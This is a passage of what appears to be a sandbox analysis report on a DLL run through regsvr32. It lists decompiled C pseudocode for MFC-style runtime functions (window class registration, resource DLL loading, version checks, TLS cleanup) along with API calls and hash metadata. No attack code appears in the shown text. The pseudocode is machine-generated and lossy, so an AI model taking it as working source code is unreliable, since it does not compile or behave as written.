                                                                                                                							_v4 = 0;
                                                                                                                							if(_t97 == 0) {
                                                                                                                								goto L4;
                                                                                                                							} else {
                                                                                                                								_t153 =  *((intOrPtr*)(_t97 + 0x20));
                                                                                                                								_v104 = 0;
                                                                                                                								if(_t153 == 0) {
                                                                                                                									goto L4;
                                                                                                                								} else {
                                                                                                                									do {
                                                                                                                										_t31 = _t128 + 0x1005cf08; // 0xfffffd3b
                                                                                                                										 *((intOrPtr*)( *_t153 + 0x104))(_t155,  *_t31,  &_v36);
                                                                                                                										if(_v28 != 0) {
                                                                                                                											_t34 = _t128 + 0x1005cf0c; // 0x4
                                                                                                                											_v104 = _v104 |  *_t34;
                                                                                                                										}
                                                                                                                										_t128 = _t128 + 8;
                                                                                                                									} while (_t128 < 0x40);
                                                                                                                									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd40,  &_v36);
                                                                                                                									_v100 = _v28;
                                                                                                                									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd43,  &_v36);
                                                                                                                									_v96 = _v28;
                                                                                                                									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd34,  &_v36);
                                                                                                                									_v84 = _v28;
                                                                                                                									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd3f,  &_v36);
                                                                                                                									_v80 = _v28;
                                                                                                                									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd41,  &_v36);
                                                                                                                									_t114 = _v28;
                                                                                                                									_push( &_v92);
                                                                                                                									_push(0x1005fb24);
                                                                                                                									_push(_t114);
                                                                                                                									if( *((intOrPtr*)( *_t114))() < 0) {
                                                                                                                										_v92 = _v92 & 0x00000000;
                                                                                                                									}
                                                                                                                									_t116 = _v16;
                                                                                                                									_push( &_v60);
                                                                                                                									_push( &_v124);
                                                                                                                									_v60 = 0x18;
                                                                                                                									_push(_t116);
                                                                                                                									if( *((intOrPtr*)( *_t116 + 0xc))() >= 0) {
                                                                                                                										 *((intOrPtr*)(_t155 + 0x70)) = _v56;
                                                                                                                										 *((intOrPtr*)(_t155 + 0x60)) = _v48;
                                                                                                                										 *((intOrPtr*)(_t155 + 0x64)) = _v44;
                                                                                                                										_v20 = 1;
                                                                                                                									}
                                                                                                                									_t118 = _v16;
                                                                                                                									 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                                									_t120 = _v92;
                                                                                                                									if(_t120 != 0) {
                                                                                                                										 *((intOrPtr*)( *_t120 + 8))(_t120);
                                                                                                                									}
                                                                                                                									__imp__#9( &_v36);
                                                                                                                									goto L19;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L4:
                                                                                                                					_push(_t131);
                                                                                                                					_v24 = 0x1006c938;
                                                                                                                					E1003D2F0( &_v24, 0x1006522c);
                                                                                                                					asm("int3");
                                                                                                                					_push(4);
                                                                                                                					E1003D1E6(E10052A8D, _t128, _t153, _t155);
                                                                                                                					_t132 = E1002D12C(0x104);
                                                                                                                					_v36 = _t132;
                                                                                                                					_t90 = 0;
                                                                                                                					_v24 = 0;
                                                                                                                					if(_t132 != 0) {
                                                                                                                						_t90 = E10022AE3(_t132);
                                                                                                                					}
                                                                                                                					return E1003D2BE(_t90);
                                                                                                                				}
                                                                                                                			}
                                                                                                                0x10030291
                                                                                                                0x1003017d
                                                                                                                0x10030173
                                                                                                                0x10030132
                                                                                                                0x10030107
                                                                                                                0x10030107
                                                                                                                0x100172a1
                                                                                                                0x100172ab
                                                                                                                0x100172b2
                                                                                                                0x100172b7
                                                                                                                0x100172b8
                                                                                                                0x100172bf
                                                                                                                0x100172ce
                                                                                                                0x100172d0
                                                                                                                0x100172d3
                                                                                                                0x100172d7
                                                                                                                0x100172da
                                                                                                                0x100172dc
                                                                                                                0x100172dc
                                                                                                                0x100172e6
                                                                                                                0x100172e6

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID: @
                                                                                                                • API String ID: 431132790-2766056989
                                                                                                                • Opcode ID: d649c840626f787c90f7b880a5a45246c03de395b0de320172a86c36782732d5
                                                                                                                • Instruction ID: d0d5ac566261c14da1d5b792e65bc9ff5ec9e63663f12a772aa802e3be5dd10e
                                                                                                                • Opcode Fuzzy Hash: d649c840626f787c90f7b880a5a45246c03de395b0de320172a86c36782732d5
                                                                                                                • Instruction Fuzzy Hash: 1851C2B1A012099FDB04CFA4C898AEEB7F9FF48305F10456AE516EB251E774A945CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E1001C538(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				intOrPtr _v44;
                                                                                                                				char _v48;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr* _t35;
                                                                                                                				intOrPtr* _t37;
                                                                                                                				intOrPtr* _t38;
                                                                                                                				void* _t40;
                                                                                                                				intOrPtr* _t54;
                                                                                                                				void* _t56;
                                                                                                                				intOrPtr _t57;
                                                                                                                				void* _t61;
                                                                                                                				void* _t64;
                                                                                                                				intOrPtr _t66;
                                                                                                                				void* _t76;
                                                                                                                
                                                                                                                				_t76 = __eflags;
                                                                                                                				E1002DA2D(1);
                                                                                                                				E1003D2F0(0, 0);
                                                                                                                				asm("int3");
                                                                                                                				_push(_t56);
                                                                                                                				_push(_t64);
                                                                                                                				_push(_t61);
                                                                                                                				_t66 = E10022C52(_t56, _t61, _t64, _t76) + 0x7c;
                                                                                                                				_t57 =  *((intOrPtr*)(E10023187(_t56, _t61, _t66, _t76) + 8));
                                                                                                                				if(_a8 != 0 || _a12 != 0) {
                                                                                                                					L5:
                                                                                                                					_v8 =  *((intOrPtr*)(E1003D47E(__eflags)));
                                                                                                                					_t35 = E1003D47E(__eflags);
                                                                                                                					_push(_a16);
                                                                                                                					 *_t35 = 0;
                                                                                                                					_push(_a12);
                                                                                                                					_push(_a8);
                                                                                                                					_push(_a4);
                                                                                                                					E1003D617(_t66, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t57);
                                                                                                                				} else {
                                                                                                                					_t79 = _a16;
                                                                                                                					if(_a16 != 0) {
                                                                                                                						goto L5;
                                                                                                                					} else {
                                                                                                                						_v8 =  *((intOrPtr*)(E1003D47E(_t79)));
                                                                                                                						_t54 = E1003D47E(_t79);
                                                                                                                						_push(_a4);
                                                                                                                						 *_t54 = 0;
                                                                                                                						E1003D617(_t66, 0x60, 0x5f, "Afx:%p:%x", _t57);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t37 = E1003D47E(_t79);
                                                                                                                				_t80 =  *_t37;
                                                                                                                				if( *_t37 == 0) {
                                                                                                                					_t38 = E1003D47E(__eflags);
                                                                                                                					_t60 = _v8;
                                                                                                                					 *_t38 = _v8;
                                                                                                                				} else {
                                                                                                                					E10017114( *((intOrPtr*)(E1003D47E(_t80))));
                                                                                                                					_pop(_t60);
                                                                                                                				}
                                                                                                                				_push( &_v48);
                                                                                                                				_push(_t66);
                                                                                                                				_push(_t57);
                                                                                                                				_t40 = E10018524(_t57, _t60, 0, _t66, _t80);
                                                                                                                				_t81 = _t40;
                                                                                                                				if(_t40 == 0) {
                                                                                                                					_v48 = _a4;
                                                                                                                					_v44 = DefWindowProcA;
                                                                                                                					_v28 = _a16;
                                                                                                                					_v24 = _a8;
                                                                                                                					_v20 = _a12;
                                                                                                                					_push( &_v48);
                                                                                                                					_v36 = 0;
                                                                                                                					_v40 = 0;
                                                                                                                					_v32 = _t57;
                                                                                                                					_v16 = 0;
                                                                                                                					_v12 = _t66;
                                                                                                                					if(E1001C4BB(_t57, _t60, 0, _t66, _t81) == 0) {
                                                                                                                						E10023F14(_t60);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t66;
                                                                                                                			}






























                                                                                                                APIs
                                                                                                                  • Part of subcall function 1002DA2D: LeaveCriticalSection.KERNEL32(?,1002D1F0,00000010,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002DA44
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1001C543
                                                                                                                  • Part of subcall function 1003D2F0: RaiseException.KERNEL32(10023196,100172B8,DF7C0CDA,?,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1003D330
                                                                                                                • __snprintf_s.LIBCMT ref: 1001C594
                                                                                                                  • Part of subcall function 1003D617: __vsnprintf_s_l.LIBCMT ref: 1003D62C
                                                                                                                • __snprintf_s.LIBCMT ref: 1001C5C6
                                                                                                                  • Part of subcall function 1003D47E: __getptd_noexit.LIBCMT ref: 1003D47E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __snprintf_s$CriticalExceptionException@8LeaveRaiseSectionThrow__getptd_noexit__vsnprintf_s_l
                                                                                                                • String ID: Afx:%p:%x
                                                                                                                • API String ID: 3966753335-3201128726
                                                                                                                • Opcode ID: d1006a21a8d9b81870fedc7bf6ca61790a1b2c54f9d960ff5418e2ea1d088644
                                                                                                                • Instruction ID: 70e73dfe5b20a951b81c56ecee5afc2c7087a6d93b3aa06843e06d0b6497e51a
                                                                                                                • Opcode Fuzzy Hash: d1006a21a8d9b81870fedc7bf6ca61790a1b2c54f9d960ff5418e2ea1d088644
                                                                                                                • Instruction Fuzzy Hash: 3B2156B4D0060DAFDB11DFA9D841ECEBBF5EF48251F104066F914AB251D770E980DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100396F6(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
                                                                                                                				intOrPtr _v40;
                                                                                                                				intOrPtr _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				void* _v52;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t26;
                                                                                                                				intOrPtr _t32;
                                                                                                                				void* _t36;
                                                                                                                				signed int _t37;
                                                                                                                				void* _t40;
                                                                                                                				intOrPtr _t41;
                                                                                                                				signed int _t42;
                                                                                                                				void* _t43;
                                                                                                                
                                                                                                                				_t39 = __ecx;
                                                                                                                				_t43 = __ecx;
                                                                                                                				_t26 = E100231BA(_t36, __ecx, _t40, __ecx, __eflags);
                                                                                                                				_t41 =  *((intOrPtr*)(_t26 + 0x3c));
                                                                                                                				if(_a4 != 0) {
                                                                                                                					_t42 = _a8;
                                                                                                                					__eflags =  *(__ecx + 0x3c) & _t42;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						 *((intOrPtr*)(E10023187(_t36, _t42, __ecx, __eflags) + 0x38)) = E100396E6;
                                                                                                                						_t24 = _t43 + 0x3c;
                                                                                                                						 *_t24 =  *(_t43 + 0x3c) | _t42;
                                                                                                                						__eflags =  *_t24;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t37 = _a8;
                                                                                                                					if(( *(__ecx + 0x3c) & _t37) != 0) {
                                                                                                                						_t49 =  *((intOrPtr*)(_t26 + 0x40)) - __ecx;
                                                                                                                						if( *((intOrPtr*)(_t26 + 0x40)) == __ecx) {
                                                                                                                							E10018992(_t39, _t49, 1);
                                                                                                                						}
                                                                                                                						if(_t41 != 0 &&  *(_t41 + 0x20) != 0) {
                                                                                                                							E1003BB70(_t41,  &_v52, 0, 0x30);
                                                                                                                							_t32 =  *((intOrPtr*)(_t43 + 0x20));
                                                                                                                							_v44 = _t32;
                                                                                                                							_v40 = _t32;
                                                                                                                							_v52 = 0x28;
                                                                                                                							_v48 = 1;
                                                                                                                							SendMessageA( *(_t41 + 0x20), 0x405, 0,  &_v52);
                                                                                                                						}
                                                                                                                						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) &  !_t37;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}




















                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 10039735
                                                                                                                • SendMessageA.USER32 ref: 10039762
                                                                                                                  • Part of subcall function 10018992: SendMessageA.USER32 ref: 100189B2
                                                                                                                  • Part of subcall function 10018992: GetKeyState.USER32(00000001), ref: 100189C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$State_memset
                                                                                                                • String ID: (
                                                                                                                • API String ID: 930327405-3887548279
                                                                                                                • Opcode ID: 705a64a3ae88b1590e3bab5bec9c51ee715fcb2b48b53edf8f19a8fe3169e298
                                                                                                                • Instruction ID: b7a58a3b74f464689faec7e7cd245a18f9c0221c6053fa548eac2f2b071fffc3
                                                                                                                • Opcode Fuzzy Hash: 705a64a3ae88b1590e3bab5bec9c51ee715fcb2b48b53edf8f19a8fe3169e298
                                                                                                                • Instruction Fuzzy Hash: 6011C135914704AFD752DFA1C986B8AB7F4FF44366F00401AE6416A580D3B0A800CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E10025D49(void* __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v16;
                                                                                                                				char _v18;
                                                                                                                				char _v280;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t11;
                                                                                                                				long _t14;
                                                                                                                				intOrPtr _t15;
                                                                                                                				char* _t18;
                                                                                                                				intOrPtr _t21;
                                                                                                                				intOrPtr _t33;
                                                                                                                				signed int _t36;
                                                                                                                
                                                                                                                				_t11 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v8 = _t11 ^ _t36;
                                                                                                                				_t35 = 0x104;
                                                                                                                				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
                                                                                                                				if(_t14 == 0 || _t14 == 0x104) {
                                                                                                                					L4:
                                                                                                                					_t15 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                				} else {
                                                                                                                					_t18 = PathFindExtensionA( &_v280);
                                                                                                                					_t35 = "%s.dll";
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsw");
                                                                                                                					_t32 =  &_v280;
                                                                                                                					_t41 = _t18 -  &_v280 + 7 - 0x106;
                                                                                                                					asm("movsb");
                                                                                                                					_t33 = _t33;
                                                                                                                					if(_t18 -  &_v280 + 7 > 0x106) {
                                                                                                                						goto L4;
                                                                                                                					} else {
                                                                                                                						E100202D5(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
                                                                                                                						_t15 = E10025A62(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E1003B437(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10025D6F
                                                                                                                • PathFindExtensionA.SHLWAPI(?), ref: 10025D85
                                                                                                                  • Part of subcall function 100202D5: _strcpy_s.LIBCMT ref: 100202E1
                                                                                                                  • Part of subcall function 10025A62: __EH_prolog3.LIBCMT ref: 10025A81
                                                                                                                  • Part of subcall function 10025A62: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10025AA2
                                                                                                                  • Part of subcall function 10025A62: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10025AB3
                                                                                                                  • Part of subcall function 10025A62: ConvertDefaultLocale.KERNEL32(?), ref: 10025AE9
                                                                                                                  • Part of subcall function 10025A62: ConvertDefaultLocale.KERNEL32(?), ref: 10025AF1
                                                                                                                  • Part of subcall function 10025A62: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10025B05
                                                                                                                  • Part of subcall function 10025A62: ConvertDefaultLocale.KERNEL32(?), ref: 10025B29
                                                                                                                  • Part of subcall function 10025A62: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10025B2F
                                                                                                                  • Part of subcall function 10025A62: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10025B68
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                • String ID: %s.dll
                                                                                                                • API String ID: 3444012488-3668843792
                                                                                                                • Opcode ID: 6d73e030381f965241e4796b8595e08e3723f497f4af8001965861db85b80627
                                                                                                                • Instruction ID: 8f2780abeed4f01e88dae2a7ee0c52ebcd0a9cc7144cd043fd87902477eeee7f
                                                                                                                • Opcode Fuzzy Hash: 6d73e030381f965241e4796b8595e08e3723f497f4af8001965861db85b80627
                                                                                                                • Instruction Fuzzy Hash: 580196B2A0021CAFDB19DBB4DD4A9EE73B9DF04701F8501AAF502E3180EA75AE04CA55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 51%
                                                                                                                			E10027B8B(void* __ecx, void* __edi) {
                                                                                                                				signed short _v16;
                                                                                                                				signed short _v20;
                                                                                                                				char _v24;
                                                                                                                				void* __ebx;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t7;
                                                                                                                				void* _t18;
                                                                                                                				intOrPtr* _t19;
                                                                                                                				void* _t24;
                                                                                                                				signed int _t25;
                                                                                                                
                                                                                                                				_t7 =  *0x1006d320; // 0xffffffff
                                                                                                                				_t32 = _t7 - 0xffffffff;
                                                                                                                				if(_t7 != 0xffffffff) {
                                                                                                                					return _t7;
                                                                                                                				}
                                                                                                                				_push(_t18);
                                                                                                                				_push(_t24);
                                                                                                                				_t19 = GetProcAddress(E1000BE70( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t18, __edi, _t24, _t32) + 0x78))))), "DllGetVersion");
                                                                                                                				_t25 = 0x40000;
                                                                                                                				if(_t19 != 0) {
                                                                                                                					E1003BB70(__edi,  &_v24, 0, 0x14);
                                                                                                                					_push( &_v24);
                                                                                                                					_v24 = 0x14;
                                                                                                                					if( *_t19() >= 0) {
                                                                                                                						_t25 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *0x1006d320 = _t25;
                                                                                                                				return _t25;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                  • Part of subcall function 1000BE70: GetModuleHandleA.KERNEL32(?,?,100265FD,ImageList_Create,?,10026657,1000D1D5,?,00000020,10066D68,00000018,100267C1,?,?,?,00000001), ref: 1000BE7D
                                                                                                                  • Part of subcall function 1000BE70: LoadLibraryA.KERNEL32(?), ref: 1000BE8E
                                                                                                                • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 10027BB2
                                                                                                                • _memset.LIBCMT ref: 10027BCB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc_memset
                                                                                                                • String ID: DllGetVersion
                                                                                                                • API String ID: 3385804498-2861820592
                                                                                                                • Opcode ID: b584492866188cf12fed214cfa5bd3cad4fb13024c55ee1a61c8ac392899d371
                                                                                                                • Instruction ID: bd8af340e131aae091ceb15de97631d9913520cd9f175e2180474c66d757a1a4
                                                                                                                • Opcode Fuzzy Hash: b584492866188cf12fed214cfa5bd3cad4fb13024c55ee1a61c8ac392899d371
                                                                                                                • Instruction Fuzzy Hash: 72F0A4B1E0022A9AE701DBECDC81B9A73E8EB04754F400521FA14F3291DB70DE0487B6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E1002D888(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v20;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t7;
                                                                                                                				signed int _t16;
                                                                                                                				intOrPtr _t18;
                                                                                                                				intOrPtr _t23;
                                                                                                                				intOrPtr _t24;
                                                                                                                				struct HWND__* _t25;
                                                                                                                				signed int _t26;
                                                                                                                
                                                                                                                				_t24 = __edi;
                                                                                                                				_t23 = __edx;
                                                                                                                				_t18 = __ebx;
                                                                                                                				_t7 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v8 = _t7 ^ _t26;
                                                                                                                				_t25 = _a4;
                                                                                                                				if(_t25 != 0) {
                                                                                                                					if((GetWindowLongA(_t25, 0xfffffff0) & 0x0000000f) != _a8) {
                                                                                                                						goto L1;
                                                                                                                					} else {
                                                                                                                						GetClassNameA(_t25,  &_v20, 0xa);
                                                                                                                						_t16 = E10018830( &_v20, "combobox");
                                                                                                                						asm("sbb eax, eax");
                                                                                                                						_t11 =  ~_t16 + 1;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L1:
                                                                                                                					_t11 = 0;
                                                                                                                				}
                                                                                                                				return E1003B437(_t11, _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 1002D8A7
                                                                                                                • GetClassNameA.USER32(00000000,?,0000000A), ref: 1002D8BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassLongNameWindow
                                                                                                                • String ID: combobox
                                                                                                                • API String ID: 1147815241-2240613097
                                                                                                                • Opcode ID: 4ad676761bfc85e6bf4b4234fafdf335c023de8cc5c4a1ec01549eb430130d93
                                                                                                                • Instruction ID: c9804d79dcf8906136f819aac079050c85216bae34d98169415d09aa786a25c0
                                                                                                                • Opcode Fuzzy Hash: 4ad676761bfc85e6bf4b4234fafdf335c023de8cc5c4a1ec01549eb430130d93
                                                                                                                • Instruction Fuzzy Hash: 24F0B431910129AFDB01FBA4DC41DBE73E8EF09610B90052AF911E71C0DE34FA048B95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 60%
                                                                                                                			E1002D5AE(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				void* _t31;
                                                                                                                				intOrPtr _t32;
                                                                                                                				signed int _t38;
                                                                                                                				struct _CRITICAL_SECTION* _t39;
                                                                                                                				intOrPtr* _t44;
                                                                                                                				long* _t47;
                                                                                                                				intOrPtr* _t50;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t50 = _a4;
                                                                                                                				_t38 = 1;
                                                                                                                				_t47 = __ecx;
                                                                                                                				_v8 = 1;
                                                                                                                				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
                                                                                                                					L10:
                                                                                                                					_t39 =  &(_t47[7]);
                                                                                                                					EnterCriticalSection(_t39);
                                                                                                                					E1002D261( &(_t47[5]), _t50);
                                                                                                                					LeaveCriticalSection(_t39);
                                                                                                                					LocalFree( *(_t50 + 0xc));
                                                                                                                					 *((intOrPtr*)( *_t50))(1);
                                                                                                                					_t31 = TlsSetValue( *_t47, 0);
                                                                                                                					L11:
                                                                                                                					return _t31;
                                                                                                                				} else {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				do {
                                                                                                                					L1:
                                                                                                                					_t32 = _a8;
                                                                                                                					if(_t32 == 0 ||  *((intOrPtr*)(_t47[4] + 4 + _t38 * 8)) == _t32) {
                                                                                                                						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
                                                                                                                						if(_t44 != 0) {
                                                                                                                							 *((intOrPtr*)( *_t44))(1);
                                                                                                                						}
                                                                                                                						_t31 =  *(_t50 + 0xc);
                                                                                                                						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
                                                                                                                					} else {
                                                                                                                						_t31 =  *(_t50 + 0xc);
                                                                                                                						if( *(_t31 + _t38 * 4) != 0) {
                                                                                                                							_v8 = _v8 & 0x00000000;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t38 = _t38 + 1;
                                                                                                                				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
                                                                                                                				if(_v8 == 0) {
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				goto L10;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 1002D60B
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 1002D61B
                                                                                                                • LocalFree.KERNEL32(?), ref: 1002D624
                                                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 1002D636
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
